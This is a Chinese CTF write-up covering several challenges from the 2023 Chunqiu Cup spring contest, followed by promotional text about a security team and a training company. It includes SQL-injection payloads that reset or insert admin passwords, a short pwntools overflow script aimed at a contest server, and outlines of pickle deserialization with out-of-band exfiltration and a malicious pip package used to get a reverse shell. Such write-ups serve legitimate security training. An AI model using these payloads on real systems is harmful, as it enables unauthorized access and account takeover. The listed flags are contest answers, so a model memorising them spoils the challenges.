本文来自:天权信安网络安全生态圈
作者:天权信安
为积极响应国家网络空间安全人才战略,加快攻防兼备创新人才培养步伐,实现以赛促学、以赛促教、以赛促用,推动网络空间安全人才培养和产学研用生态发展。通过竞赛的形式,让大学生在模拟的网络环境中进行攻防演练,学习如何发现和利用漏洞,如何防范和应对攻击,提高自身的安全防护能力。其次,竞赛也促进高校信息安全教育的发展,推动信息安全教育的普及和深入。此外,竞赛还通过选拔机制,发掘和培养优秀的信息安全人才,为信息安全行业的发展注入新的活力。最后,竞赛也促进信息安全领域的交流和合作,推动信息安全技术的创新和发展。
Phpstudy
本来以为是XSS+CSRF反弹shell,但是一直弹不上,猜测是登陆界面sql注入放入X-Requested-With:XMLHttpRequest请头就能进入登陆界面用户名sadmin’;UPDATE ADMINS set PASSWORD =’c26be8aaf53b15054896983b43eb6a65′;–admin/123456
计划任务执行cat /f*
Easypy
Dir扫目录,有个download路由,下载源码
被删了,有个pyc反编译一下得到源码
过滤了R,sh,bash,利用点是resp = numpy.loads(numpydata)
Pickle反序列化,手搓opcode
过滤了上面这些字符,所以直接先将执行的内容存到文件里,利用vps外带
Exp如下
传参base64编码后的内容,监听即可得到flag
Phpstudy
导出http:
改为压缩包得到:
取证大师加载一下发现BitLocker解密:
根据提示找到
tcp.srcport == 20 && tcp.dstport == 80
提取出来得到:
bi-locker:120483-350966-299189-055297-225478-133463-431684-359403
解密得:
有好多图片,取证大师试用无法一次性全部提取,发现有一个图片很大,提取出来
Foremost一下:
使用magick montage拼接一下:
猜测是password:856a-a56b6a705653
flag2:-919c-a140d7054ac5
使用AXIOM Process挂载一下:
Flag1:f97d5b05-d312-46ac
拼接一下
flag{f97d5b05-d312-46ac-919c-a140d7054ac5}
盲人会藏在哪里
加一下文件头得到密码
ChunJiSai7k7kbibi@!
得到坤坤:
Zsteg查看一下:
发现了个ag{,提取一下看看
flag{2c8ba897-0205-9bff-123d-281d12a24c38}
p2048
from pwn import *
p = remote(‘39.106.65.236’, 29728)
p.sendline(b’t’*0x400)
p.interactive()
玩几次就会溢出偏移到后门函数
flag{3834fe18-932d-4b34-9427-57565f0a803c}
piphack
上传恶意python包
压缩之后改成png格式,然后h->H绕过过滤,监听端口pip传该地址,下载这个png
反弹到shell得到flag
flag{4661747e-c7ed-4d2e-a2ee-315243be16a8}
checkin
第一部分求解一下pell函数得到x,y
直接使用二项式展开定理即可还原flag
backdoor
可以直接将z表示出来然后就能求解key了
ezrust
审计猜测当前目录就是work
所以./得到flag
qqcms
代码审计,找到后台路由是/index/admin
有历史漏洞,直接SQL注入改密码{{loop sql=‘INSERT INTO qc_user VALUES (666, 16666666666, “管理员”, “”,
“e10adc3949ba59abbe56e057f20f883e”, “”, “”, 1, “”, 2, 0.00, 0, 1, 1652334396, “127.0.0.1”, 1, 1, 1, 1652334410,
“127.0.0.1”)’}}{{/loop}}
登陆后台后发现文件包含漏洞
得到flag
BWBA
Exp如下
Poisoned_tea_CHELL
exp如下
#flag{cdfec405-3f4b-457e-92fe-f6446098ee2e}
–天权信安网络安全团队–
网络无边 安全有界
用技术撬动未来,用奋斗描绘成功!
天权信安网络安全团队(简称“天权信安”),成立于2022年,是一支研究红蓝对抗、内网渗透、红队武器库、CTF竞赛及其网安相关活动的安全团队。这里聚集着一群有技术有担当有理想、热爱信安奉献信安的多方面专业人才。天权信安的“天权”来源于北斗七星,又称为文曲星,它代表着天资聪颖,能力超群,也象征着天权信安的高标准、高水平与高质量,体现着我们的宗旨–打造一支作风优良、实力强劲、团结协作的精英团队,用技术与毅力共同守护网络安全。目前成员 40 余人,队员分布于科大、航空大、武大、华科、西工大、西电、警大、江苏海洋大学、国际关系学院、广大、河北师大、吉林师大、西南石油、安工院、湖工大、华师大等国内各大高校,也分布于绿盟科技、奇安信、长亭科技、安恒信息、联通、移动等国内大厂。为“网络安全爱好者”提供一个更好的学习交流生态圈,天权信安欢迎技术大咖、CTF选手等资深专业人士前来分享网络安全前沿技术、攻防实战经验、内网渗透、IOT安全、电子取证、CTF、工控安全等技术,通过经验分享,来帮助大家了解最新网络安全动态,提升安全技术水平,拓宽知识领域,致力于打造一个开放共享的网络安全生态圈。
–最新动态–
网络无边 安全有界
凌泽网安
凌泽网安是一家本土专业的网络安全公司。基于核心实验室团队深厚的攻防技术基因及靶场建设能力,秉承着“ 止错于靶场之内,安网于事故之前,构筑检验性安全体系” 的使命,致力于打国内最具实战的靶场平台以及提供最专业的网络安全服务。主营产品包括网络安全靶场建设、网络安全培训、网络安全赛事服务、网络安全实验室建设、攻防演练等。
SaaS在线教育平台
攻防演练靶场
公司成员均来自国内顶级安全团队人员和诸多知名战队,致力于构建网络安全人才培养体系。先后举办了一系列具有业内影响力的网络安全赛事及演练活动,研制了具备国内领先水平的可视化城市靶场平台和可支持多种赛制的赛事演练平台。
网络靶场
凌泽网安将采用“竞赛+科研创新+人才培养+服务+实战产品=网络安全”的“三位一体”人才培养模式,旨在培养复合型、创新型和应用型网络安全人才,以解决网络安全人才缺口。公司将把“人才强队”作为地勘经济发展的基本战略,重视人才的引进和培养,树立以人为本的科学人才观。公司将从战略和全局的高度,深刻认识人才在地勘经济发展中的关键性、基础性和决定性作用,把人才工作纳入单位总体工作之中,把人才强队战略作为加快地勘事业发展的基本战略。公司将优先招收主专业的人才,同时每年预留少量岗位用于特殊人才专项预留,以保持人才的层次性和多样性。
CTF竞赛平台
楚泽实验室介绍
2023年4月正式将天权信安网络安全团队并入武汉楚泽实验室,楚泽实验室(Chuze Laboratory)是专注于靶场、网络与信息安全技术研究与创新工作的实验室,由来自全国名校热爱CTF和网络攻防的知名战队成员组成。实验室基于网络安全竞赛相关服务(包括技术平台提供、场景开发、技术支撑、培训、赛事运维等)、漏洞挖掘与利用、新型红蓝对抗、红队渗透攻击、安全产品运维等领域推出技术顶级服务。
实训平台
实验室以“ 锐意创新,与时俱进” 为宗旨,以“止错于靶场之内,安网于事故之前,构筑检验性安全体系”为使命,成为国家级网络安全服务支撑单位。研发出新一代网络靶场产品,面向全国培养高水平的网络安全人才,提供实战攻防演练和网安人才培训所需的仿真实训平台。为包括为政府、公安、金融、高校、电力、能源、运营商、企业等行业提供全面专业性的支持与服务。致力于成为中国网络与信息安全自主方案提供商。
和多样性。
AGCTF战队介绍
安阳工学院信息安全实验室AGCTF战队成立于2016年隶属于计算机科学与信息工程学院,也是由凌泽网安与安工院共建的校内安全团队,信息安全学生团队依托信息安全实验室,以研究信息安全为主,用CTF竞赛来证明自己的实力,日常学习过程中注重实验员未来的发展鼓励实验员参加国家组织的各式安全活动。信息安全学生团队现有成员19名,CTF队伍四队(三人一队)大二学生九人、大三学生三人。团队在最近的国家级赛事中排名均在五十名左右,2019获得省级以上奖励三次,2020年获得省级以上奖励四次。实验室现有证书23张,其中国家级证书7张省级证书16张。2020年我校安全团队三名大二的成员受邀请参与
某单位护网行动,均得到邀请方的赞扬及工作认可。
往期回顾
原文始发于微信公众号(天权信安):2023年春秋杯–网络安全联赛春季赛部分WP
